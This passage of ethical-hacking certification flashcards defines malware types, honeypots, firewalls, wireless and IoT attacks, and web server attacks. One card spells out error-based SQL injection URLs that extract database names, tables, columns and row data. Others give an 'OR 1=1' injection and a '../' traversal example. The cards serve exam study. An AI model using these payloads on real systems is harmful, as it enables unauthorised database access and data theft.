containing recorded keystroke data. Tools -KeyGrabber USB -capture -KeyCarbon -Keyllama -KeyGhost -KeyCobra
Software Keystroke Loggers
These loggers are installed remotely via a network or email attachment in a target system for recording all the keystrokes. There are four types of software keystroke loggers: > Application Keylogger -An application keylogger allows you to observe everything the user types in his or her emails, chats, and other applications, including passwords. -With this, you even can trace the records of Internet activity. It is an invisible keylogger to track and record everything happening within the entire network. > Kernel/Rootkit/Device Driver Keylogger- Attackers rarely use kernel keyloggers because it is difficult to write and requires a high level of proficiency from the keylogger developers. -exist at the kernal level -they are difficult to detect, especially for user-mode applications. -This kind of keylogger acts as a keyboard device driver and thus gains access to all information typed on the keyboard > Hypervisor-based Keylogger - works within a malware hypervisor operating on the operating system > Form Grabbing Based Keylogger- records the web form data and then submits it over the Internet, after bypassing https encryption. Form-grabbing-based keyloggers log web form inputs by recording web browsing on the Submit event function.
Perform Error-Based SQL Injection
These messages help an attacker to build a vulnerability exploit request. There is even a potential to create automated exploits, depending on the error messages generated by the database server. Extract Database Name *( http://www.certifiedhacker.com/page.aspx?id=1 or 1=convert(int,(DB_NAME))-- )* -Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int. Extract 1st Database Table *( http://www.certifiedhacker.com/page.aspx?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))-- )* -Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int. Extract 1st Table Column Name *( http://www.certifiedhacker.com/page.aspx?id=1 or 1=convert(int, (select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))-- )* -Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a column of data type int. Extract 1st Field of 1st Row (Data) *( http://www.certifiedhacker.com/page.aspx?id=1 or 1=convert(int, (select top 1 COLUMN-NAME-1 from TABLE-NAME-1))-- )* -Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type in
Raw Packet Capturing Tools
These tools capture every packet and support both Ethernet LAN and 802.11, and display network traffic at the MAC level. o WirelessNetView o PRTG Network Monitor o Tcpdump o RawCap o Airodump-ng o Microsoft Network Monitor
Stealth Viruses/ Tunneling Viruses
These viruses try to hide from antivirus programs by actively altering and corrupting the service call interrupts while running. These viruses state false information to hide their presence from antivirus programs Evade the anti-virus software by intercepting its requests to the operating system This virus can hide by intercepting the anti-virus software's request to read the file and passing the request to the virus, instead of the OS Virus Removal -o Always do a cold boot (boot from write-protected CD or DVD) -o Never use DOS commands such as FDISK to fix the virus -o Use anti-virus software
Cloud Carrier
They act as an intermediary that provides connectivity and transport services between CSPs and cloud consumers. They provides access to consumers via a network, telecommunication, and other access devices.
Security Awareness Trainers
They are responsible for developing and providing appropriate training programs on the risk management process and IT security awareness in an organization. -People responsible for this role will be subject matter experts and validate that only proper content is included in the program.
Message Digest (One-way Hash) Functions
They produce values that are almost impossible to invert, resistant to attack, mostly unique, and widely distributed. They enable creation of digital signatures and message authentication codes (MACs), and the derivation of encryption keys from passphrases. Include the following algorithms: o MD5 o SHA
IT Security Practitioners
They protect the personnel, the physical and information security in an organization. -They are responsible for implementing security controls. T
Footprinting: Groups, Forums, Blogs
They provide Public network info, system info, personal info Search for information by -Fully Qualified Domain Names (FQDNs), -IPs, -usernames -Google Groups, -Yahoo Groups -Register with fake profiles and social engineer the organizations employees
Vulnerability Assessment: Service-Based
Third Party solutions; some are hosted in-network, some out of network. Attacker use could audit a network from outside.
Vulnerability Assessment: Service-Based
Third Party solutions; some are hosted in-network, some out of network. Attacker use could audit a network from outside. pg 146
[cache:]
This operator displays Google's cached version of a web page, instead of the current version of the web page [cache:www.eff.org] will show Google's cached version of the Electronic Frontier Foundation home page
BlueSniff
This Bluetooth attack is a proof of concept code for a Bluetooth wardriving utility. It is useful for finding hidden and discoverable Bluetooth devices. It operates on Linux.
Bluesmacking
This Bluetooth attack occurs when an attacker sends an oversized ping packet to a victim's device, causing a buffer overflow. This type of attack is similar to an ICMP ping of death.
Blue Snarfing
This Bluetooth attack uses OBEX to gaining access to sensitive data in a Bluetooth-enabled device. An attacker who is within range of a target can use special software to obtain the data stored on the victim's device.
Unicode Evasion
This Evasion Technique is a character coding system that supports encoding, processing, and displaying of written texts for universal languages to maintain consistency in a computer representation. Attackers can implement an attack by different character encodings known as "code points" in the Unicode code space, the most commonly used character encodings are Unicode Transformation Format (UTF)-8 and UTF-16.
What is session hijacking?
This attack refers to the exploitation of a session-token generation mechanism or token security controls so that the attacker can establish an unauthorized connection with a target server. The attacker can guess or steal a valid session ID (which identifies authenticated users) and uses it to establish a session with the server. The web server responds to the attacker's requests as though it were communicating with an authenticated user.
Network Level Hijacking
This Hijacking is the interception of packets during the transmission between client and server in a TCP/UDP session Successful attack will provide the attacker with crucial information, which will be used to attack the application level sessions. Most likely attackers perform this level hijacking because they do not require to modify the attack on a per web application basis. This attack focuses on the data flow of the protocol, shared across all web applications. Relies on hijacking transport and Internet protocols used by web applications in the application layer. By attacking the this level, the attacker gathers some critical information which is used to attack the application level sessions.
Host-based Intrusion Detection System (HIDS)
This IDS analyze each system's behavior. This can be installed on any system ranging from a desktop PC to a server. It is more versatile than the NIDS. In addition to detecting unauthorized insider activity, they are also effective at detecting unauthorized file modification. Focuses on the changing aspects of local systems
Backdoor Trojans
This Trojan bypasses the system's customary security mechanisms to gain access to a restricted area of a computer system The difference between this type of malware and other types of malware is that the installation of this is performed without the user's knowledge. used by the attacker to have uninterrupted access to the target machine. Tool - PoisionIvy
Botnet Trojans
This Trojan infects a large number of computers across a large geographical area to create a network of bots that is controlled through a Command and Control center This is used to launch various attacks on a victim including denial-of-service attacks, spamming, click fraud, and the theft of financial information They trick regular computer users to download Trojan infected files to their systems through phishing, SEO hacking, URL redirection, among others. Once the user downloads and executes this Trojans in the system, it connects back to the attacker using IRC channels and waits for further instruction Tool-Necurs
Proxy Server Trojans
This Trojan is usually a standalone application that allows remote attackers to use the victim's computer as a proxy to connect to the internet This Trojan, when infected, starts a hidden proxy server on the victim's computer. Thousands of machines on the Internet are infected with this technique Attackers use it for anonymous Telnet, ICQ, or IRC to purchase goods using stolen credit cards, as well as other such illegal activities
Covert Channel Tunneling Tool Trojan (CCTT)
This Trojan presents various exploitation techniques, creating arbitrary data transfer channels in the data streams authorized by a network access control system It enables attackers to get an external server shell from within the internal network and vice-versa It sets a TCP/UDP/HTTP CONNECT|POST channel allowing TCP data streams (SSH, SMTP, POP, etc.) between an external server and a box from within the internal network.
Remote Access Trojans
This Trojan provides attackers with full control over the victim's system, enabling them to remotely access files, private conversations, accounting data, and others. -work like remote desktop access -hacker gains complete GUI access to the remote system The RAT acts as a server and listens on a port that is not supposed to be available to Internet attackers
Discretionary Access Control (DAC)
This access controls determine the access controls taken by any possessor of an object in order to decide the access controls of the subjects on those objects. The other name for this is a need-to-know access model. It permits the user, who is granted access to information, to decide how to protect the information and the level of sharing desired. Access to files is restricted to users and groups based upon their identity and the groups to which the users belong.
MAC Address
This address is 48 bits, which splits into two sections, each containing 24 bits. The first section contains the ID number of the organization, the next section contains the serial number assigned to the NIC adapter and is called the NIC Specific. contains 12-digit hexadecimal numbers, divided into three or six groups. The first six digits indicate the manufacturer, while the next six digits indicate the adapter's serial number. D4-BE-D9-14-C8-29 D4-BE-D9 - ID of organization /Manufactor 14-C8-29 - NIC Specific /adaptor serial Also know as hardware address
Hidden Content Discovery
This allows an attacker to recover backup copies of live files, configuration files and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality which is not linked to the main application, etc. Web Spidering -Web spiders automatically discover the hidden content and functionality by parsing HTML form and client-side JavaScript requests and responses o OWASP Zed Attack proxy-Attacker Directed o Burp Suite - Brute Force -to make huge numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality. o WebScarab o Scrapy
Omnidirectional Antenna
This antennas radiate electromagnetic energy in all directions. -It provides a 360-degree horizontal radiation pattern. -A good example radio stations. These antennas are effective for radio signal transmission because the receiver may not be stationary. Therefore, a radio can receive a signal regardless of where it is
DNS Server Hijacking
This attack compromises DNS Server & changes the settings so that the user requests are misdirected to malicious site
DoS/DDoS
This attack involves flooding targets with numerous fake requests so that the target stops functioning and will be unavailable to the legitimate users. To crash the web server running the application, attacker targets the following services by consuming the web server with fake requests. - Network bandwidth - Server memory - Application exception handling mechanism - CPU usage - Hard disk space - Database space
Integral Cryptanalysis
This attack is particularly useful against block ciphers based on substitution-permutation networks as an extension of differential cryptanalysi Looks at pairs of inputs that differ in only one-bit position, with all other bits being identical. For k = 1, this is just differential cryptanalysis, but with k > 1, it is a new techniqu
Hash Collision Attack
This attack is performed by finding two different input messages that result into same hash output. most popular hash function is SHA-1, which is widely used as a digital signature algorithm. SHA-1 algorithm converts input message into constant length of unstructured strings of numbers and alphabets,
Sequential Change Point Detection
This change-point detection technique identifies the typical scanning activities of the network worms. technique filters network traffic by IP addresses, targeted port numbers, and communication protocols used, and stores the traffic flow data in a graph that shows the traffic flow rate versus time. Change-point detection algorithms isolate changes in network traffic statistics and in traffic flow rate caused by attacks. If there is a drastic change in traffic flow rate, a DoS attack may be occurring. This technique uses Cumulative Sum (Cusum) algorithm to identify and locate the DoS attacks; the algorithm calculates deviations in the actual versus expected local average in the traffic time series.
Central Source propagation
This code propagation requires a central source where attack toolkit is installed. - when the attacker exploits the vulnerable machine, it opens the connection on infected system listening for file transfer. then the toolkit is copied from the central source. this toolkit is automatically installed automatically after transferring from central source. general, this technique uses HTTP, FTP, and RPC protocols.
Back-Chaining Propagation
This code propagation requires the toolkit installed on attacker's machine. when an attacker exploits the vulnerable machine. it opens the connection on infected system listening for file transfer. then, the toolkit is copied from the attacker. once the toolkit is installed on the infected system, it will search for other vulnerable system and the process continues. Simple port listeners (which copy file contents) or full intruder-installed web servers, both of which use the Trivial File Transfer protocol (TFTP) support this back-channel file copy.
Attify
This consists of a set of tools used to perform ZigBee penetration testing
ASCII Shell Code
This contains only characters from the ASCII standard. This form of shellcode allows attackers to bypass commonly enforced character restrictions within string input code. It also helps attackers bypass IDS pattern matching signatures because shellcode hides strings in a similar way to polymorphic shellcode Using this is very restrictive, in that it limits what the shellcode can do under some circumstances, When executed, the shellcode above executes a "/bin/sh" shell. 'bin' and 'sh' are contained in the last few bytes of the shellcode.
Website Mirroring
This copies an entire website and its content onto the local drive HTTrack -an offline browser utility. It downloads a Website from the Internet to a local directory, building all directories recursively, getting HTML, images, and other files from the server. -HTTrack arranges the original site's relative link-structure. WebCopier Pro GNU Wget Website Ripper
Mandatory Access Control (MAC):
This determine the usage and access policies of the users. Users can access a resource only if that particular user has the access rights to that resource. IT finds its application in the data marked as highly confidential. The network administrators impose this, depending on the operating system and security kernel. It does not permit the end user to decide who can access the information, and does not permit the user to pass privileges to other users as the access could then be circumvented.
Vulnerability Scanning
This determines vulnerabilities and misconfigurations of a target web server or a network. Vulnerability scanning finds possible weaknesses in a target server to exploit in a web server attack. Acunetix -scans websites and detects vulnerabilities. -checks web applications for SQL injections, XSS, -It supports testing of web forms and password protected areas, pages with CAPTCHA, single sign-on, and two-factor authentication mechanisms. Nessus Paros Fortify Webinspect
LDAP injection attack
This directory services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries. (Lightweight Directory Access Protocol) is based on the client-server model and clients can search the directory entries using filters.
Unvalidated Redirects and Forwards
This enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass -Attackers lure victim and make them click on unvalidated links that appear to be legitimate. -Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass, leading to: o Session Fixation Attack o Security Management Exploits o Failure to Restrict URL Access o Malicious File Execution
Cross certification
This enables entities in one PKI to trust entities in another PKI. The agreement establishes the responsibilities and liability of each party. A mutual trust relationship between two CAs requires that each CA issues a certificate to the other to establish the relationship in both the directions.
Symmetric Encryption
This encryption requires that both the sender and the receiver of the message possess the same encryption key The sender uses a key to encrypt the plaintext and sends the resultant cipher text to the recipient, who uses the same key (used for encryption) to decrypt the cipher text into plain text. When setting up a wireless network, an administrator enters a preshared key for security, the key entered is a symmetric key used to encrypt the wireless data.
Circuit-level Gateway Firewall
This firewall works at the session layer of the OSI model or TCP layer of TCP/IP. It forwards data between networks without verifying it, and blocks incoming packets into the host, but allows the traffic to pass through itself. For detecting whether or not a requested session is valid, it checks TCP handshaking between packets Circuit proxy firewalls allow or prevent data streams; they do not filter individual packets. They are relatively inexpensive and hide the information about the private network that they protect.
Stateful Multi-layer Inspection Firewall
This firewalls combine the aspects of the other three types of firewalls (Packet Filtering, Circuit Level Gateways, and Application Level Firewall). They filter packets at the network layer of the OSI model (or the IP layer of TCP/IP), to determine whether session packets are legitimate, and they evaluate the contents of packets at the application layer Features - This type of firewall can remember the packets that passed through it earlier and make decisions about future packets based on the stated in the conversation. - These firewalls provide the best of both packet filtering and application-based filtering. - Cisco PIX firewalls are stateful. - These firewalls track and log slots or translations.
Application-level Firewall
This gateways (proxies) firewall can filter packets at the application layer of the OSI model (or the application layer of TCP/IP). Incoming and outgoing traffic is restricted to services supported by proxy It examine traffic and filter on application-specific commands such as HTTP: post and get Features - They analyze the application information to make decisions about whether to permit traffic. - Being proxy-based, they can permit or deny traffic according to the authenticity of the user or process involved. - A content-caching proxy optimizes performance by caching frequently accessed information rather than sending new requests to the servers for the same old data.
Directory Traversal
This gives them access to restricted directories; they execute commands outside the web server's root directory. This attack exposes the directory structure of an application and often the underlying web server and operating system. Example: The following example uses "../" to go back several directories and obtain a file containing the backup of a web application: http://www.targetsite.com/../../../sitebackup.zip
Low interaction honeypot
This honeypot emulates only limited number of services and applications of a target system or network. If the attacker does something that the emulation does not expect, the honeypot will simply generate an error These honeypots cannot be compromised completely. They capture limited amounts of information, mainly transactional data, and some limited interaction. They are set to collect higher level information about attack vectors such as network probes and worm activities
Medium interaction honeypot
This honeypot simulates a real OS, applications and its services of a target network. These honeypots can only respond to preconfigured commands, therefore, the risk of intrusion increases. The main disadvantage of this honeypot is that the attacker can quickly discover that the system behavior is abnormal. Tools- HoneyPy, Kojoney2, and Cowrie.
Production Honeypot
This honeypots emulate real production network of an organization. Attackers uncover and discover the vulnerabilities and trigger alerts that help network administrators to provide early warnings of attacks and hence reduce the risk of an intrusion. This type of honeypots can also emulate different trojans, viruses, and backdoors to attract the attackers. As this is deployed internally, it also helps to find out internal flaws and attackers within an organization.
Normal SQL Query
This include data selection, data retrieval, inserting/updating data, and creating data objects like databases and tables. Query statements begin with a command such as SELECT, UPDATE, CREATE, or DELETE. SELECT Count(*) FROM Users WHERE UserName='Jason' AND Password='Springfield'
Web Application Architecture
This includes different devices, web browsers, and external web services that work with different scripting languages to execute the web application. It is comprises of three layers: 1. Client or presentation layer 2. Business logic layer 3. Database Layer
Attack Session Management Mechanism
This involves exchanging sensitive information between the server and its clients wherever required. Session prediction is the time, when attackers identify a pattern in the session token exchanged between client and server. This can happen when the web application has weak predictable session identifiers. For example, when the web application assigns a session token sequentially, attackers can predict the previous and next session tokens by knowing any one session ID. Before predicting a session identifier, attackers have to obtain enough valid session tokens for legitimate system users. sniffing session id - wireshark
Session Hijacking using XSS
This involves injecting malicious code into the website that is subsequently executed by the browser. Using the stolen cookies attacker exploits active computer sessions, thereby gaining unauthorized access to the data.
Bypass Firewall via SSH Tunneling
This involves sending unencrypted network traffic through an SSH tunnel. For example, suppose you want to transfer files on an unencrypted FTP protocol, but the FTP protocol is blocked on the target firewall. The unencrypted data can be sent over encrypted SSH protocol using SSH tunneling. Attackers make use of this technique to bypass firewall restrictions. They connect to external SSH servers and create SSH tunnels to port 80 on the remote server, thereby bypassing firewall restrictions. Attackers make use of OpenSSH (OpenBSD Secure Shell) to encrypt and tunnel all traffic from a local machine to a remote machine to avoid detection by perimeter security controls. O
Bluebugging
This is a Bluetooth attack in which an attacker gains remote access to a target Bluetooth-enabled device without the victim being aware of it. In this attack, an attacker sniffs sensitive information and might perform malicious activities such as intercepting phone calls and messages, forwarding calls and text messages, etc.
HTTP Public Key Pinning (HPKP)
This is a Trust on First Use (TOFU) technique. It is used in an HTTP header that allows a web client to associate a specific public key certificate with a particular server to minimize the risk of man-in-the-middle attacks with fraudulent certificates.
Honeypots
This is a computer system on the Internet intended to attract and trap people who try unauthorized or illicit utilization of the host system to penetrate into an organization's network. It has no authorized activity, does not have any production value, and any traffic to it is likely a probe, attack, or compromise. Whenever there is any interaction with a this, it is most likely to be a malicious activity This help in preventing attacks, detecting attacks, and for information gathering and research. It can log port access attempts, or monitor an attacker's keystrokes Detection Tool - Send-Safe Honeypot Hunter
Web Server
This is a computer system that stores, processes, and delivers web pages to the global clients via HTTP protocol. Depending on the request, the this collects the requested information/content from the data storage or from the application servers and responds to the client's request with an appropriate HTTP response. If it cannot find the requested information, then it generates an error message
related:
This operator displays websites that are similar or related to the URL specified. [related:www.microsoft.com] provides the Google search engine results page with websites similar to microsoft.com.
location:
This operator finds information for a specific location. [location: 4 seasons restaurant] will give you results based around the term 4 seasons restaurant
Hardware Firewall
This is a dedicated firewall device placed on the perimeter of the network. It is an integral part of network setup and is also built into Broadband routers or as a standalone product. It employs a technique of packet filtering. It reads the header of a packet to find out the source and destination address and compares it with a set of predefined and/or user-created rules that determine whether if it should forward or drop the packet. It functions on an individual system or a particular network connected using a single interface However, it is considered a more expensive option, difficult to implement and upgrade
WebScarab
This is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols. It allows the attacker to review and modify requests created by the browser before they are sent to the server and to review and modify responses returned from the server before they are received by the browser. This framework has the following plugins: o Fragments o Proxy o Manual intercept o Beanshell o Bandwidth simulator o Spider o SessionID analysis o Parameter "fuzzer" o SOAP o XSS/CRLF
Z-Wave sniffer
This is a hardware tool used to sniff traffic generated by smart devices connected in the network.
Short-range communication : Z-Wave
This is a low power, short-range communication designed primarily for home automation. It provides a simple and reliable way to wirelessly monitor and control household devices like HVAC, thermostat, garage, home cinema e
KFSensor
This is a low-interaction honeypot, used to attract and identify penetrations. They implement vulnerable system services and Trojans to attract hackers. This honeypot can be used to monitor all TCP, UDP, and ICMP ports and services. KFSensor identifies and alerts about port scanning and denial-of-service attacks.
Enumeration
This is a method of intrusive probing, through which attackers gather information such as network user lists, routing tables, security flaws, and Simple Network Management Protocol (SNMP) data. This is significant, because the attacker ranges over the target territory to glean information about the network, and shared users, groups, applications, and banners. This involves making active connections to the target system or subjecting it to direct queries. Normally, an alert and secure system will log such attempts. Often, the information gathered is publicly available anyway, such as a DNS address; however, it is possible that the attacker might stumble upon a remote IPC share, such as IPC$ in Windows, that can be probed with a null session, thus allowing shares and accounts to be enumerated
Virtual Private Network (VPN)
This is a network that provides secure access to the private network through the internet. They are used for connecting wide area networks (WAN). It allows computers on one network to connect to computers on another network. It is used for the secure transmission of sensitive information over an untrusted network, using encapsulation and encryption. This is an attempt to combine both the advantages of public and private networks. They have no relation to firewall technology, but firewalls are convenient for adding VPN features as they help in providing secure remote services All of these that run over the Internet employ these principles: - Encrypts the traffic - Checks for integrity protection - Encapsulates into new packets, which are sent across the Internet to something that reverses the encapsulation - Checks the integrity - Then finally, decrypts the traffic
Hotfixes
This is a package used to address a critical defect in a live environment, and contains a fix for a single issue. It updates a specific version of a product. It provide solutions faster and ensure that the issues are resolved. Apply these to software patches on production systems. These are an update to fix a specific customer issue and not always distributed outside the customer organization.
Cain & Abel
This is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
Honeynet
This is a prime example of a high-interaction honeypot and is neither a product nor a software solution that a user installs. Instead, it is an architecture—an entire network of computers designed to attack. The idea is to have an architecture that creates a highly controlled network with real computers running real applications, in which all activities are monitored and logged Without the knowledge of the attackers, all their activities and actions, from encrypted SSH sessions to email and file uploads, is captured by inserting kernel modules on the victim's systems. At the same time, this controls the attacker's activity. It deso this by using a honeywall gateway, which allows inbound traffic to the victim's systems but controls the outbound traffic using intrusion prevention technologies.
What is Encapsulation Security Payload (ESP)?
This is a protocol in IPSEC that offers confidentiality. In transport mode (also ESP [Encapsulating Security Payload]), IPsec encrypts only the payload of the IP packet, leaving the header untouched. In tunnel mode, the system encrypts the entire IP packet (payload and IP header) and encapsulates the encrypted packets into a new IP packet with a new header. ESP does not provide integrity and authentication for the entire IP packet in transport mode. You can apply ESP alone, or in conjunction with AH, or in a nested fashion. It protects only the IP data payload on default setting. In tunnel mode, it protects both the payload and the IP header.
IRDP Router Discovery Protocol (IRDP) Spoofing
This is a routing protocol that allows a host to discover the IP addresses of active routers on its subnet by listening to router advertisement and solicitation messages on its network. An attacker can use this to send spoofed router advertisement messages so that all the data packets travel through the attacker's system. Thus, the attacker can sniff the traffic and collect valuable information from the data packets. Attackers can use this to launch MITM, DoS, and passive sniffing attacks. *Passive Sniffing*: In a switched network, the attacker spoofs IRDP traffic to re-route the outbound traffic of target hosts through the attacker's machine. *MITM*: Once sniffing starts, the attacker acts as a proxy between the victim and destination. The attacker plays an MITM role and tries to modify the traffic. *DoS*: IDRP spoofing allows remote attackers to add wrong route entries into victims routing table. The wrong address entry causes DoS.
What is IPSEC?
This is a set of protocols that the IETF (Internet Engineering Task Force) developed to support the secure exchange of packets at the IP layer. It ensures interoperable cryptographically based security for IP protocols (IPv4 and IPv6), and supports network-level peer authentication, data origin authentication, data integrity, data confidentiality (encryption), and replay protection. It is widely used to implement virtual private networks (VPNs) and for remote user access through dial-up connection to private networks.
beSTORM
This is a smart fuzzer to find buffer overflow vulnerabilities by automating and documenting the process of delivering corrupted input and watching for unexpected response from the application.
medium-range communication: LTE advanced
This is a standard for mobile communication that provides enhancement to LTE thus focusing on providing higher capacity in terms of data rate, extended range, efficiency and performance
Virtual Hosting
This is a technique of hosting multiple domains or websites on the same server. This allows sharing of resources between various servers. It is employed in large-scale companies where the company resources are intended to be accessed and managed globally. Types: o Name-based hosting o IP-based hosting o Port-based hosting
DroidSheep
This is a tool used for session hijacking on Android devices connected on common wireless network. It gets the session ID of active user on Wi-Fi network and uses it to access the website as an authorized user. It user can easily see what the authorized user is doing or seeing on the website. It can also hijack the social account by obtaining the session ID. Sandbox: App sandboxing is a security mechanism that helps protect the system from harmful apps
Distributed Reflection Denial of Service (DRDoS)
This is a type of DoS attack in which intermediary and secondary victims are also involved in the process of launching a DoS. attackers sends requests to the intermediary victim which direct the traffic towards a secondary victim. the secondary victim redirects the traffic toward the target. This attack exploits the TCP three-way handshake vulnerability. Also known as a "spoofed" attack, involves the use of multiple intermediary and secondary machines that contribute to the actual DDoS attack against the target machine or application The DRDoS attack exploits the TCP three-way handshake vulnerability. This attack is more effective than a typical DDoS attack as multiple intermediary and secondary victims generate huge attack bandwidth. Its difficult or even impossible to trace the attacker. Countermeasures -o Turn off the Character Generator Protocol (CHARGEN) service to stop this attack method -o Download the latest updates and patches for servers
Long-range communication : Cellular
This is a type of communication protocol that is used for communication over a longer distance. It is used to send high-quality data but with a cost of being expensive and high consumption of power
wired communication : Power-line Communication
This is a type of protocol where electrical wires are used to transmit power and data from one end point to another end point. PLC is required for applications in different areas like home automation, industrial devices and for broadband over power lines (BPL).
Waterhole Attack
This is a type of unvalidated redirect attack where the attacker first identifies the most visited website of the target, identifies the vulnerabilities in the website, injects malicious code into the vulnerable web application, and waits for the victim to browse the website. Once the victim tries to access the website, the malicious code executes infecting the victim.
Vulnerability Assessment Phase
This is a very crucial phase in vulnerability management. In this step, the security analyst identifies the known vulnerabilities in the organization infrastructure. 1. Evaluate physical security 2. Check for misconfigs & human error 3. Vuln scans 4. ID & prioritize vulns 5. Apply business & tech context to scan results 6. Validate vulns through OSINT 7. Generate vuln scan report pg 145
IIS Web Server Architecture
This is a web server application developed by Microsoft for Windows. It is a flexible, secure, and easy-to-manage web server for hosting anything on the web. It supports HTTP(80), HTTPS(443), FTP(20/21), FTPS(990), SMTP(25), and NNTP(119)
Short-range communication : Thread
This is an IPv6 based networking protocol for IoT devices. Its main aim is home automation, so that the devices can communicate with each other on local wireless networks.
Short-range communication : Light-Fidelity (Li-Fi):
This is like Wi-Fi with only two differences: mode of communication and the speed. It is a Visible Light Communications (VLC) system that uses common household light bulbs for data transfer at a very high speed of 224Gbps.
Honeytrap
This is low-interaction honeypot used to observe attacks against TCP and UDP services. It runs as a daemon and starts server processes dynamically on requested ports Attackers are tricked, and they send responses to this server process. The data that is received by the this is concatenated into a string and stored in a database file. This string is called attack string. This parses attack strings for a command requesting the server to download a file from another host in the network requesting the server to download a file from another host in the network
Kojoney2
This is medium interaction honeypot. It emulates a real SSH environment. This honeypot listens on port 21 for incoming SSH connections. If a connection request is initiated, it will verify users against an internal list of fake users. Mostly, the connections are accepted by granting access to SSH shell. It simulates many shell commands to trick attackers. Using this attackers can download files using wget and curl commands.
IoT Architecture : Middleware Layer
This is one of the most critical layers that operates in two-way mode. As the name suggests this layer sits in the middle of the application layer and the hardware layer, thus behaving as an interface between these two layers. It is responsible for important functions such as data management, device management and various issues like data analysis, data aggregation, data filtering, device information discovery and access control.
Document Root
This is one of the web server's root file directories that stores critical HTML files related to the web pages of a domain name that will serve in response to the requests.
Software Firewall
This is similar to a filter It sits between the regular application and the networking components of the OS. It is more helpful for individual home users, is suitable for mobile users who need digital security working outside of the corporate network and it is easy to install on an individual's PC, notebook, or workgroup server. Software firewalls utilize more resources, than hardware firewalls and this reduces the speed of system. Examples of software firewalls are produced by Norton, McAfee, and Kaspersky among others.
Web Services XML Poisoning
This is similar to an SQL injection attack. Attackers insert malicious XML codes in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic.
Directory Traversal
This is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside of the web server's root directory by manipulating a URL. -A web server is vulnerable to this attack if it accepts input data from a browser without proper validation. -attackers use ../ (dot-dot-slash) sequence to access restricted directories -poorly patched or configured web server software can make the web server itself vulnerable to this attack -Attackers can use the trial-and-error method to navigate outside of the root directory and access sensitive information in the system.
Machine.config
This is the mechanism of securing information by changing the machine level settings. This can o ensure that protected resources are mapped to HttpForbiddenHandler and unused HttpModules are removed o ensure that tracing is disabled and debug compiles are turned off o validate that ASP.NET errors are not reverted back to the client o verify session state settings
OWASP A6: Security Misconfiguration
This is the most common issue in the web security, which is due in part to manual or ad hoc configuration (or not configuring at all), insecure default configurations, open S3 buckets, misconfigured HTTP headers, error messages containing sensitive information, not patching or upgrading systems, frameworks, dependencies, and components in a timely fashion (or at all). -Unvalidated inputs -Parameter/Form tampering -Improper Error Handling -Insufficient Transport Layer Protection
wired communication : Ethernet
This is the most commonly used type of network protocol today. It is a type of LAN (Local Area Network) which refers to a wired connection of computers in a small building, office or on a campus
Server Root
This is the top-level root directory under the directory tree in which the server's configuration and error, executable, and log files are stored. It consists of the code that implements the server. In general, it consists of four files where one file is dedicated to the code that implements the server and other three are subdirectories, namely, -conf, -logs, and -cgi-bin used for configuration information, store logs, and executables, respectively.
Bluejacking
This is the use of Bluetooth to send messages to users without the recipient's consent, similar to email spamming. It also uses OBEX protocol. Use BBProxy tool for an attack
LPWAN : Sigfox
This is used in devices that have small battery life and need to transfer low level of data
LPWAN : LoRaWAN
This is used to support applications such as mobile, industrial machine-to-machine and secure two-way communications for IoT devices, smart cities and healthcare applications.
Client or presentation layer
This layer of the Web Application Architecture includes all physical devices present on the client side, such as laptops, smart phones, and computers.
Business logic layer
This layer of the Web Application Architecture is comprised of two layers: the web-server logic layer and the business logic layer. The web-server logic layer contains various components, such as a firewall, an HTTP request parser, a proxy caching server, an authentication and login handler and resource handler, and a hardware component-like server -The web-server logic layer holds all coding that reads data from the browser and returns the results (e.g., IIS Web Server, Apache Web Server). The business logic layer includes the functional logic of the web application, which is implemented using technologies such as .NET, Java, and "middleware" technologies. -It stores the application data and integrates legacy applications with the latest functionality of the application.
IoT Architecture : Application Layer
This layer placed at the top of the stack, is responsible for the delivery of services to the respective users from different sectors like building, industrial, manufacturing, automobile, security, healthcare, etc.
Obfuscating
This means to make code harder to understand or read, generally for privacy or security purposes. This is an IDS evasion technique used by attackers to encode the attack packet payload in such a way that the destination host can only decode the packet but not the IDS. An attacker manipulates the path referenced in the signature to fool the HIDS. Using the Unicode character, an attacker could encode attack packets that the IDS would not recognize, but an IIS web server would decode
Cross-Site Request Forgery (CSRF or XSRF) Attack
This method is a kind of attack in which an authenticated user is made to perform certain tasks on the web application that an attackers chooses. For example, a user clicking on a particular link sent through an email or chat. Also known as a one-click attack, occurs when a hacker instructs a user's web browser to send a request to the vulnerable website through a malicious web page. Financially related websites commonly contain CSRF vulnerabilities.
SQL injection attack
This occurs when users enter a SQL statement into a form in which they are supposed to enter a name or other data For example, the following SQL statement, *SELECT * FROM tablename WHERE UserID= 2302* becomes the following with a simple SQL injection attack: *SELECT * FROM tablename WHERE UserID= 2302 OR 1=1* The expression *"OR 1=1"* evaluates to the value *"TRUE*," often allowing the enumeration of all user ID values from the database.
Promiscuous Policy
This policy does not impose any restrictions on the usage of system resources. -While this can be useful in corporate businesses where people who travel or work at branch offices need to access the organizational networks, many malware, virus, and Trojan threats are present on the Internet and due to free Internet access, this malware can come as attachments without the knowledge of the user. -Network administrators must be extremely alert while choosing this type of policy.
Bypass Firewall via ICMP Tunneling
This protocol is used to send an error message to the client. As it is required service for network communication, therefore user often enables this service on their networks. Moreover, it does not cause a significant threat from the security perspective. Attacker takes advantage of enabled ICMP protocol on the network and performs ICMP tunneling to send his/her malicious data into the target network. ICMP Tunnel provides attackers with full access to target networks Tool - loki
Virtual Document Tree
This provides storage on a different machine or a disk after the original disk is filled-up. It is case sensitive and can be used to provide object-level security.
Web Server Misconfiguration
